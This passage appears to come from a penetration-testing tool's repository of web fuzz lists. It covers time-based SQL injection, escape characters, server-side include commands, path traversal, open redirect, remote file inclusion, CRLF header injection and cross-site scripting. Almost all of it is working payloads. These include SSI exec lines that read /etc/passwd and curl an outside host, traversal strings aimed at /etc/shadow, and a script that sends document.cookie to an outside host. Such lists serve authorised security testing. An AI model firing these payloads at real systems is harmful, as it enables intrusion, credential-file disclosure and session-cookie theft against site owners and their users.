52 |  OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
53 |  SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
54 | 


--------------------------------------------------------------------------------
/FuzzLists/sqli_escape_chars.txt:
--------------------------------------------------------------------------------
 1 | '
 2 | "
 3 | ''
 4 | '"
 5 | ;
 6 | 
 7 | )
 8 | ')
 9 | ")
10 | ");
11 | ';
12 | ";
13 | %'
14 | %"
15 | %')
16 | %")
17 | '))
18 | "))
19 | ")))
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/FuzzLists/ssi_quick.txt:
--------------------------------------------------------------------------------
 1 | </nowiki>
 2 | <!--#echo var="DOCUMENT_NAME" -->
 3 | <!--#echo var="DOCUMENT_URI" -->
 4 | <!--#config timefmt="A %B %d %Y %r"-->
 5 | <!--#echo var="DATE_LOCAL" -->
 6 | <!--#include virtual="http://sn1persecurity.com/.testing/rfi_vuln.php" -->
 7 | <!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
 8 | <!--#include virtual="/" -->
 9 | <!--#exec cmd="ls" -->
10 | <!--#exec cmd="whoami" -->
11 | <!--#exec cmd="uname" -->
12 | <!--#exec cmd="dir" -->
13 | <!--#exec cmd="cat /etc/passwd" -->
14 | <!--#exec cmd="ipconfig" -->
15 | <!--#exec cmd="curl http://sn1persecurity.com/.testing/rfi_vuln.php" -->
16 | <!--#exec cmd="perl -e 'print "X"*5000'" -->
17 | <!--#exec cmd="sleep 5" -->
18 | <!--#exec cmd="sleep 10" -->
19 | 


--------------------------------------------------------------------------------
/FuzzLists/traversal-short.txt:
--------------------------------------------------------------------------------
 1 | /etc/passwd
 2 | /etc/passwd%00
 3 | /etc/shadow
 4 | /etc/shadow%00
 5 | /etc/hosts
 6 | /etc/hosts%00
 7 | /boot.ini
 8 | /boot.ini%00
 9 | C:\boot.ini
10 | C:\boot.ini%00
11 | https://crowdshield.com/.testing/rfi_vuln.php
12 | https://crowdshield.com/.testing/rfi_vuln.php%00
13 | //sn1persecurity.com/.testing/rfi_vuln.php
14 | //sn1persecurity.com/.testing/rfi_vuln.php%00
15 | http://sn1persecurity.com/.testing/rfi_vuln.php
16 | http://sn1persecurity.com/.testing/rfi_vuln.php%00
17 | /../../../../../../../../../../../../../../../../../../etc/passwd
18 | /../../../../../../../../../../../../../../../../../../etc/shadow
19 | /../../../../../../../../../../../../../../../../../../etc/hosts
20 | /../../../../../../../../../../../../../../../../../../etc/passwd%00
21 | /../../../../../../../../../../../../../../../../../../etc/shadow%00
22 | /../../../../../../../../../../../../../../../../../../etc/hosts%00
23 | /../../../../../../../../../../../../../../../../../../boot.ini
24 | /../../../../../../../../../../../../../../../../../../boot.ini%00
25 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
26 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\shadow
27 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\hosts
28 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
29 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
30 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\hosts%00
31 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
32 | \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
33 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
34 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
35 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts
36 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
37 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00
38 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts%00
39 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
40 | %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
41 | /..........................................................................\..\..\..\..\..\..\..\boot.ini
42 | /..........................................................................\..\..\..\..\..\..\..\etc/passwd
43 | /..........................................................................\..\..\..\..\..\..\..\boot.ini%00
44 | /..........................................................................\..\..\..\..\..\..\..\etc/passwd%00
45 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
46 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
47 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
48 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd%00
49 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/shadow
50 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/shadow%00
51 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/hosts
52 | /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/hosts%00
53 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
54 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow
55 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/hosts
56 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
57 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd%00
58 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow%00
59 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/hosts%00
60 | %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini%00
61 | /
62 | /../
63 | /../../
64 | /../../../
65 | /../../../../
66 | /../../../../../
67 | /../../../../../../
68 | /../../../../../../../
69 | /../../../../../../../../
70 | /../../../../../../../../../
71 | /../../../../../../../../../../
72 | /../../../../../../../../../../../
73 | /../../../../../../../../../../../../
74 | /../../../../../../../../../../../../../
75 | \
76 | \..\
77 | \..\..\
78 | \..\..\..\
79 | \..\..\..\..\
80 | \..\..\..\..\..\
81 | \..\..\..\..\..\..\
82 | \..\..\..\..\..\..\..\
83 | \..\..\..\..\..\..\..\..\
84 | \..\..\..\..\..\..\..\..\..\
85 | \..\..\..\..\..\..\..\..\..\..\
86 | \..\..\..\..\..\..\..\..\..\..\..\
87 | \..\..\..\..\..\..\..\..\..\..\..\..\
88 | \..\..\..\..\..\..\..\..\..\..\..\..\..\
89 | 


--------------------------------------------------------------------------------
/FuzzLists/url_payloads.txt:
--------------------------------------------------------------------------------
  1 | http://sn1persecurity.com
  2 | .sn1persecurity.com
  3 | .crowdshield.com
  4 | //sn1persecurity.com
  5 | \\sn1persecurity.com
  6 | \/sn1persecurity.com
  7 | \/\/sn1persecurity.com
  8 | /\sn1persecurity.com
  9 | /\/\sn1persecurity.com
 10 | |/sn1persecurity.com
 11 | /%09/sn1persecurity.com
 12 | /sn1persecurity.com
 13 | javascript:document.location=http://sn1persecurity.com
 14 | %2Fwww%252egoogle%252ecom
 15 | %2Fwww%252egoogle%252ecom%252f
 16 | %2Fwww%2egoogle%2ecom
 17 | %ff%2Fwww%252egoogle%252ecom
 18 | %ff%2Fwww%252egoogle%252ecom%252f
 19 | //www.sn1persecurity.com/%2E%2E
 20 | /www.sn1persecurity.com/%2E%2E
 21 | /%2fwww.sn1persecurity.com/%2e%2e/
 22 | //////www.sn1persecurity.com/%2e%2e/
 23 | //www.sn1persecurity.com/
 24 | \/www.sn1persecurity.com/
 25 | \/www.sn1persecurity.com/
 26 | \/www.sn1persecurity.com/%2e%2e/
 27 | /\www.sn1persecurity.com/%2e%2e/
 28 | /%2fwww.sn1persecurity.com/%2e%2e
 29 | /%2fwww.sn1persecurity.com/%2e%2e/
 30 | https://www.sn1persecurity.com/
 31 | %0a.sn1persecurity.com/
 32 | www.sn1persecurity.com/
 33 | %0d.sn1persecurity.com%2f
 34 | %0d%2esn1persecurity.com%2f
 35 | %0a%2esn1persecurity.com%2f
 36 | %2e%5fsn1persecurity.com%2e%5f
 37 | %2fwww.sn1persecurity.com/%2e%2e
 38 | %2fwww.sn1persecurity.com%2f%2e%2e
 39 | %2Fwww%252egoogle%252ecom
 40 | %2Fwww%252egoogle%252ecom%252f
 41 | %2Fwww%2egoogle%2ecom
 42 | %ff%2Fwww%252egoogle%252ecom
 43 | %ff%2Fwww%252egoogle%252ecom%252f
 44 | //www.sn1persecurity.com/%2E%2E
 45 | /www.sn1persecurity.com/%2E%2E
 46 | /%2fwww.sn1persecurity.com/%2e%2e/
 47 | //////www.sn1persecurity.com/%2e%2e/
 48 | //www.sn1persecurity.com/
 49 | \/www.sn1persecurity.com/
 50 | \/www.sn1persecurity.com/
 51 | \/www.sn1persecurity.com/%2e%2e/
 52 | /\www.sn1persecurity.com/%2e%2e/
 53 | /%2fwww.sn1persecurity.com/%2e%2e
 54 | /%2fwww.sn1persecurity.com/%2e%2e/
 55 | https://www.sn1persecurity.com/
 56 | %0a.sn1persecurity.com/
 57 | www.sn1persecurity.com/
 58 | %0d.sn1persecurity.com%2f
 59 | %0d%2esn1persecurity.com%2f
 60 | %0a%2esn1persecurity.com%2f
 61 | %2e%5fsn1persecurity.com%2e%5f
 62 | %2fwww.sn1persecurity.com/%2e%2e
 63 | %2fwww.sn1persecurity.com%2f%2e%2e
 64 | '+alert(INJECTX)+'/%2E%2E
 65 | "><img/src='x'onerror=alert(INJECTX)>/%2E%2E/%2E%2E/
 66 | %2Fx%2F%3cimg%2Fonerror='alert(INJECTX)'src=x%3e%2f.%2e%2f.%2e%2f%3f
 67 | /x/<img/onerror='alert(INJECTX)'src=x>/../../
 68 | INJECTX'"<>/%2e%2e
 69 | INJECTX'"<>/%2e%2e/
 70 | INJECTX'"<>
 71 | INJECTX%27%22%3c%3e%2e%2e
 72 | INJECTX%27%22%3c%3e%2e%2e/
 73 | INJECTX/%2e%2e
 74 | INJECTX/%2e%2e/
 75 | %2e%2e/INJECTX/
 76 | %2e%2e/INJECTX
 77 | http://sn1persecurity.com/.testing/redirect_vuln.txt
 78 | http://sn1persecurity.com/.testing/redirect_vuln.txt%00
 79 | http://sn1persecurity.com/.testing/rfi_vuln.txt
 80 | http://sn1persecurity.com/.testing/rfi_vuln.txt%00
 81 | http://sn1persecurity.com/.testing/rfi_vuln.php
 82 | http://sn1persecurity.com/.testing/rfi_vuln.php%00
 83 | http://sn1persecurity.com/.testing/xss_vuln.php
 84 | http://sn1persecurity.com/.testing/xss_vuln.php%00
 85 | http://sn1persecurity.com/.testing/xss_vuln.html
 86 | http://sn1persecurity.com/.testing/xss_vuln.html%00
 87 | http://sn1persecurity.com/.testing/xss.html
 88 | http://sn1persecurity.com/.testing/xss.html%00
 89 | http://sn1persecurity.com/.testing/iframe_injection.php
 90 | //sn1persecurity.com
 91 | \/sn1persecurity.com
 92 | |/sn1persecurity.com
 93 | /%09/sn1persecurity.com
 94 | /sn1persecurity.com
 95 | crowdshield.com
 96 | sn1persecurity.com
 97 | javascript:alert(1)//INJECTX
 98 | javascript:document.location=http://sn1persecurity.com
 99 | php://input
100 | data://text/plain;base64,SmJhdHk4Y1dIbFJhemh6Q3lqQTw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPkpiYXR5OGNXSGxSYXpoekN5akE=
101 | php://input;base64,SmJhdHk4Y1dIbFJhemh6Q3lqQTw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPkpiYXR5OGNXSGxSYXpoekN5akE=
102 | https://crowdshield.com/.testing/rfi_vuln.php
103 | https://crowdshield.com/.testing/rfi_vuln.php%00
104 | //sn1persecurity.com/.testing/rfi_vuln.php
105 | //sn1persecurity.com/.testing/rfi_vuln.php%00
106 | http://sn1persecurity.com/.testing/rfi_vuln.php
107 | http://sn1persecurity.com/.testing/rfi_vuln.php%00
108 | %0a
109 | %0a
110 | %0a%20
111 | %0a%20
112 | %0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0aLocation%3Ahttp%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%0a%0a
113 | %0d%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0d%0aLocation%3Ahttp%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%0d%0a%0d%0a
114 | %0d%0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
115 | %0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX;
116 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
117 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLocation%3A%20http%3A%2F%2Fcrowdshield.com%0aContent-Length%3A%20122%0a%3Chtml%3E%3CBODY%20ONLOAD%3Dalert('XSS')%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E%3C%2Fbody%3E%3C%2Fhtml%3E
118 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
119 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%2052%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
120 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%20769%0a%3Chtml%3E%3Cbody%3E%3Cscript%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.js%3Fscript_src%3D1%22%3E%3C%2Fscript%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src%3D1%22%3E%3C%2Fimg%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%220%22%20width%3D%220%22%3E%3C%2Fiframe%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%22100%25%22%20width%3D%22100%25%22%3E%3C%2Fiframe%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dprompt(%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.js%22)%3B%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dwindow.location(%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.html%22)%3B%3E%0a%3Cscript%3Elocation.href%3D'http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3F'%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
121 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aLast-Modified%3A%20Fri%2C%2006%20Mar%202017%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
122 | //crowdshield.com%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20222%0d%0a<script>alert%28%27INJECTX%27%29<%2fscript>%0d%0a%0d%0a
123 | %0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0dINJECTX%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d
124 | %0a%0a%0a%0a%0a%0a%%0a%0a%0a%0a%0a%0aINJECTX%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a%0a
125 | %0a
126 | %0d
127 | %0d%0a
128 | %0d%0a
129 | %0d%0a
130 | %0d%0a%20
131 | %0d%0a%20
132 | %0d%0a%20
133 | https://crowdshield.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Set-Coookie%3AINJECTX%3DINJECTX
134 | %0d%0aContent-Length:%200%0d%0d%0a%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0d%0a%0a<html>Hacked</html>
135 | %0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aContent-Type%3A%20text%2Fhtml%0d%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0d%0aContent-Length%3A%2048%0d%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
136 | %0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0d%0aContent-Length%3A%2040%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
137 | %0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0d%0aContent-Length%3A%2052%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
138 | %0d%0aContent-Length%3A%200%0d%0d%0a%0aHTTP%2F1.1%20200%20OK%0d%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0d%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0d%0aContent-Length%3A%20769%0d%0a%3Chtml%3E%3Cbody%3E%3Cscript%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.js%3Fscript_src%3D1%22%3E%3C%2Fscript%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src%3D1%22%3E%3C%2Fimg%3E%0d%0a%3Ciframe%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%220%22%20width%3D%220%22%3E%3C%2Fiframe%3E%0d%0a%3Ciframe%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%22100%25%22%20width%3D%22100%25%22%3E%3C%2Fiframe%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dprompt(%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.js%22)%3B%3E%0d%0a%3Cimg%20src%3D%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dwindow.location(%22http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fxss.html%22)%3B%3E%0d%0a%3Cscript%3Elocation.href%3D'http%3A%2F%2Fsn1persecurity.com%2F.testing%2Fiframe_injection.php%3F'%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
139 | %0d%0aReferer:%20https://crowdshield.com/INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
140 | %0d%20
141 | %0d%20
142 | %0dContent-Length:%200%0d%0dHTTP/1.1%20200%20OK%0dContent-Type:%20text/html%0dContent-Length:%2019%0d%0d<html>Hacked</html>
143 | 200%20OK%0aCookie%3A%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0aContent-Type%3A%20text%2Fhtml%0a%0a%3Chtml%3E%0a%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E%0a%3C%2Fhtml%3E%3C!--%0a%0a
144 | 200%20OK%0d%0aCookie%3A%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0d%0aContent-Type%3A%20text%2Fhtml%0d%0d%0a%0a%3Chtml%3E%0d%0a%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E%0d%0a%3C%2Fhtml%3E%3C!--%0d%0d%0a%0a
145 | %0aSet-Cookie:%20INJECTX=INJECTX;%0a
146 | %20%0a
147 | %20%0a
148 | %20%0a%20
149 | %20%0d
150 | %20%0d
151 | %20%0d%0a
152 | %20%0d%0a
153 | %20%0d%0a
154 | %20%0d%0a%20
155 | %20%0d%0a%20
156 | %20%0d%0a%20
157 | %20%0d%20
158 | %20%0d%20
159 | %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Set-Cookie%3AINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
160 | %20%250a
161 | %20%250a%250d
162 | %250a
163 | %250a%20
164 | %250a%250d
165 | %250a%250d%20
166 | %25%30%41%a
167 | %25%30%44%25%30%41%a
168 | %25%30%44%a
169 | %25%30%61%a
170 | %25%30%64%a
171 | %25%32%30%25%30%64%25%30%61%a
172 | %2F%2crowdshield.com%0aContent-Type%3Atext%2Fhtml%0aContent-Length%0a222%0a%3Cscript%3Ealert('XSSPOSED')%3C%2Fscript%22%3E
173 | %2F%2Fcrowdshield.com%0d%0aContent-Type%3Atext%2Fhtml%0d%0aContent-Length%0d%0a222%0d%0a%3Cscript%3Ealert('XSSPOSED')%3C%2Fscript%22%3E
174 | %5c%72%5c%6e
175 | %5C%72%5C%6E
176 | %5cr%5cn
177 | %5CR%5CN
178 | INJECTX%0dXTest%3AINJECTX
179 | INJECTX%250aXTest%3AINJECTX
180 | %e5%98%8a
181 | %e5%98%8A
182 | %E5%98%8a
183 | %E5%98%8A
184 | en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
185 | en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E
186 | en%0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLocation%3A%20http%3A%2F%2Fcrowdshield.com%0aContent-Length%3A%20122%0a%3Chtml%3E%3CBODY%20ONLOAD%3Dalert('XSS')%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E%3C%2Fbody%3E%3C%2Fhtml%3E
